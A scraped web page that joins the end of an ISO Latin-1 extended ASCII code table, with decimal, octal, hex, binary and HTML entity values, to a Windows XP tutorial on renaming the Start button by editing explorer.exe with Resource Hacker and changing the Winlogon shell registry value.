1261767E01111110~&#126;Equivalency sign - tilde
1271777F01111111
&#127;Delete

The extended ASCII codes (character code 128-255)

There are several different variations of the 8-bit ASCII table. The table below is according to ISO 8859-1, also called ISO Latin-1. Codes 129-159 contain the Microsoft® Windows Latin-1 extended characters.
DEC OCT HEX BIN Symbol HTML Number HTML Name Description
1282008010000000&#128;&euro;Euro sign
1292018110000001
1302028210000010&#130;&sbquo;Single low-9 quotation mark
1312038310000011ƒ&#131;&fnof;Latin small letter f with hook
1322048410000100&#132;&bdquo;Double low-9 quotation mark
1332058510000101&#133;&hellip;Horizontal ellipsis
1342068610000110&#134;&dagger;Dagger
1352078710000111&#135;&Dagger;Double dagger
1362108810001000ˆ&#136;&circ;Modifier letter circumflex accent
1372118910001001&#137;&permil;Per mille sign
1382128A10001010Š&#138;&Scaron;Latin capital letter S with caron
1392138B10001011&#139;&lsaquo;Single left-pointing angle quotation
1402148C10001100Œ&#140;&OElig;Latin capital ligature OE
1412158D10001101
1422168E10001110Ž&#142;Latin captial letter Z with caron
1432178F10001111
1442209010010000
1452219110010001&#145;&lsquo;Left single quotation mark
1462229210010010&#146;&rsquo;Right single quotation mark
1472239310010011&#147;&ldquo;Left double quotation mark
1482249410010100&#148;&rdquo;Right double quotation mark
1492259510010101&#149;&bull;Bullet
1502269610010110&#150;&ndash;En dash
1512279710010111&#151;&mdash;Em dash
1522309810011000˜&#152;&tilde;Small tilde
1532319910011001&#153;&trade;Trade mark sign
1542329A10011010š&#154;&scaron;Latin small letter S with caron
1552339B10011011&#155;&rsaquo; Single right-pointing angle quotation mark
1562349C10011100œ&#156;&oelig;Latin small ligature oe
1572359D10011101
1582369E10011110ž&#158;Latin small letter z with caron
1592379F10011111Ÿ&#159;&yuml;Latin capital letter Y with diaeresis
160240A010100000&#160;&nbsp;Non-breaking space
161241A110100001¡&#161;&iexcl;Inverted exclamation mark
162242A210100010¢&#162;&cent;Cent sign
163243A310100011£&#163;&pound;Pound sign
164244A410100100¤&#164;&curren;Currency sign
165245A510100101¥&#165;&yen;Yen sign
166246A610100110¦&#166;&brvbar;Pipe, Broken vertical bar
167247A710100111§&#167;&sect;Section sign
168250A810101000¨&#168;&uml;Spacing diaeresis - umlaut
169251A910101001©&#169;&copy;Copyright sign
170252AA10101010ª&#170;&ordf;Feminine ordinal indicator
171253AB10101011«&#171;&laquo;Left double angle quotes
172254AC10101100¬&#172;&not;Not sign
173255AD10101101­&#173;&shy;Soft hyphen
174256AE10101110®&#174;&reg;Registered trade mark sign
175257AF10101111¯&#175;&macr;Spacing macron - overline
176260B010110000°&#176;&deg;Degree sign
177261B110110001±&#177;&plusmn;Plus-or-minus sign
178262B210110010²&#178;&sup2;Superscript two - squared
179263B310110011³&#179;&sup3;Superscript three - cubed
180264B410110100´&#180;&acute;Acute accent - spacing acute
181265B510110101µ&#181;&micro;Micro sign
182266B610110110&#182;&para;Pilcrow sign - paragraph sign
183267B710110111·&#183;&middot;Middle dot - Georgian comma
184270B810111000¸&#184;&cedil;Spacing cedilla
185271B910111001¹&#185;&sup1;Superscript one
186272BA10111010º&#186;&ordm;Masculine ordinal indicator
187273BB10111011»&#187;&raquo;Right double angle quotes
188274BC10111100¼&#188;&frac14;Fraction one quarter
189275BD10111101½&#189;&frac12;Fraction one half
190276BE10111110¾&#190;&frac34;Fraction three quarters
191277BF10111111¿&#191;&iquest;Inverted question mark
192300C011000000À&#192;&Agrave;Latin capital letter A with grave
193301C111000001Á&#193;&Aacute;Latin capital letter A with acute
194302C211000010Â&#194;&Acirc;Latin capital letter A with circumflex
195303C311000011Ã&#195;&Atilde;Latin capital letter A with tilde
196304C411000100Ä&#196;&Auml;Latin capital letter A with diaeresis
197305C511000101Å&#197;&Aring;Latin capital letter A with ring above
198306C611000110Æ&#198;&AElig;Latin capital letter AE
199307C711000111Ç&#199;&Ccedil;Latin capital letter C with cedilla
200310C811001000È&#200;&Egrave;Latin capital letter E with grave
201311C911001001É&#201;&Eacute;Latin capital letter E with acute
202312CA11001010Ê&#202;&Ecirc;Latin capital letter E with circumflex
203313CB11001011Ë&#203;&Euml;Latin capital letter E with diaeresis
204314CC11001100Ì&#204;&Igrave;Latin capital letter I with grave
205315CD11001101Í&#205;&Iacute;Latin capital letter I with acute
206316CE11001110Î&#206;&Icirc;Latin capital letter I with circumflex
207317CF11001111Ï&#207;&Iuml;Latin capital letter I with diaeresis
208320D011010000Ð&#208;&ETH;Latin capital letter ETH
209321D111010001Ñ&#209;&Ntilde;Latin capital letter N with tilde
210322D211010010Ò&#210;&Ograve;Latin capital letter O with grave
211323D311010011Ó&#211;&Oacute;Latin capital letter O with acute
212324D411010100Ô&#212;&Ocirc;Latin capital letter O with circumflex
213325D511010101Õ&#213;&Otilde;Latin capital letter O with tilde
214326D611010110Ö&#214;&Ouml;Latin capital letter O with diaeresis
215327D711010111×&#215;&times;Multiplication sign
216330D811011000Ø&#216;&Oslash;Latin capital letter O with slash
217331D911011001Ù&#217;&Ugrave;Latin capital letter U with grave
218332DA11011010Ú&#218;&Uacute;Latin capital letter U with acute
219333DB11011011Û&#219;&Ucirc;Latin capital letter U with circumflex
220334DC11011100Ü&#220;&Uuml;Latin capital letter U with diaeresis
221335DD11011101Ý&#221;&Yacute;Latin capital letter Y with acute
222336DE11011110Þ&#222;&THORN;Latin capital letter THORN
223337DF11011111ß&#223;&szlig;Latin small letter sharp s - ess-zed
224340E011100000à&#224;&agrave;Latin small letter a with grave
225341E111100001á&#225;&aacute;Latin small letter a with acute
226342E211100010â&#226;&acirc;Latin small letter a with circumflex
227343E311100011ã&#227;&atilde;Latin small letter a with tilde
228344E411100100ä&#228;&auml;Latin small letter a with diaeresis
229345E511100101å&#229;&aring;Latin small letter a with ring above
230346E611100110æ&#230;&aelig;Latin small letter ae
231347E711100111ç&#231;&ccedil;Latin small letter c with cedilla
232350E811101000è&#232;&egrave;Latin small letter e with grave
233351E911101001é&#233;&eacute;Latin small letter e with acute
234352EA11101010ê&#234;&ecirc;Latin small letter e with circumflex
235353EB11101011ë&#235;&euml;Latin small letter e with diaeresis
236354EC11101100ì&#236;&igrave;Latin small letter i with grave
237355ED11101101í&#237;&iacute;Latin small letter i with acute
238356EE11101110î&#238;&icirc;Latin small letter i with circumflex
239357EF11101111ï&#239;&iuml;Latin small letter i with diaeresis
240360F011110000ð&#240;&eth;Latin small letter eth
241361F111110001ñ&#241;&ntilde;Latin small letter n with tilde
242362F211110010ò&#242;&ograve;Latin small letter o with grave
243363F311110011ó&#243;&oacute;Latin small letter o with acute
244364F411110100ô&#244;&ocirc;Latin small letter o with circumflex
245365F511110101õ&#245;&otilde;Latin small letter o with tilde
246366F611110110ö&#246;&ouml;Latin small letter o with diaeresis
247367F711110111÷&#247;&divide;Division sign
248370F811111000ø&#248;&oslash;Latin small letter o with slash
249371F911111001ù&#249;&ugrave;Latin small letter u with grave
250372FA11111010ú&#250;&uacute;Latin small letter u with acute
251373FB11111011û&#251;&ucirc;Latin small letter u with circumflex
252374FC11111100ü&#252;&uuml;Latin small letter u with diaeresis
253375FD11111101ý&#253;&yacute;Latin small letter y with acute
254376FE11111110þ&#254;&thorn;Latin small letter thorn
255377FF11111111ÿ&#255;&yuml;Latin small letter y with diaeresi

Customise START button Text in Windows



Tired of the boring old “start” button at the bottom left corner of your Windows XP’s monitor? Want something new to replace iit? Well here’s how to change it.
With a few modifications in the Windows Registry, you can replace the “start” text with anything you like. Great for achieving a new, custom look for your Windows XP. So let’s get started.

Warning: this tutorial is more for advanced users, and I'm not
responsible if your system gets messed up. Only attempt the following
at your own risk.

Step 1: Modify explorer.exe

If the warning didn’t scare you enough, then the title of this step probably did. Yes, we are going to change Explorer, the backbone of your Windows XP, but don’t worry. Everything should be safe as long as you follow the steps closely.
As explorer is a binary file, we need a special tool to modify it. One of the best ones for this purpose is Resource Hacker. There are of course others that will get the trick done, but we will be using RH this tutorial so I recommend installing it to avoid making mistakes. Install it and let’s continue.
As always before changing anything. you want to back up. So open My Computer and navigate to   and look for explorer. Copy paste it to a safe location on your hard drive.
Now that you’ve backed it up, fire up Resource Hacker and find the same explorer.exe.


When you’ve found and opened explorer in RH, navigate to String Table -> 37 -> 1033. The “start” value is on line 4, after the 578. Change the text “start” to anything you want, making sure you keep the quotes. In this example. I changed the text to xptricks.net.
Press the Compile Script button to make Resource Hacker put together the code. Now click File and Save the script as explorer.exe. into C: \WINDOWS\inf or another C: \WINDOWS subfolder.
Note: make sure you choose Save AS, NOT just save!!
And that’s all for the first step! Now let’s move onto the second one -modifying the registry.

Step 2: changing the registry.

By now, you have a modified explorer sitting in the /inf/ subfolder, so we need to tell Windows to use that one, instead of the original one still resting untouched.
To do this, we need to make just one simple registry modification. To open up the registry, press start (something else soon  ) -> run and type regedit.
In the registry editor window that opens, navigate toHKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\ Windows NT\ CurrentVersion\ Winlogon and look for the registry entry “shell”. Click it.

Change the explorer.exe to inf/explorer.exe or whereever you saved the modified explorer.
And believe it or not, you’re done! All you have to do now is reboot or log out and bacö in to see the changes. Enjoy your new custom Windows XP start button!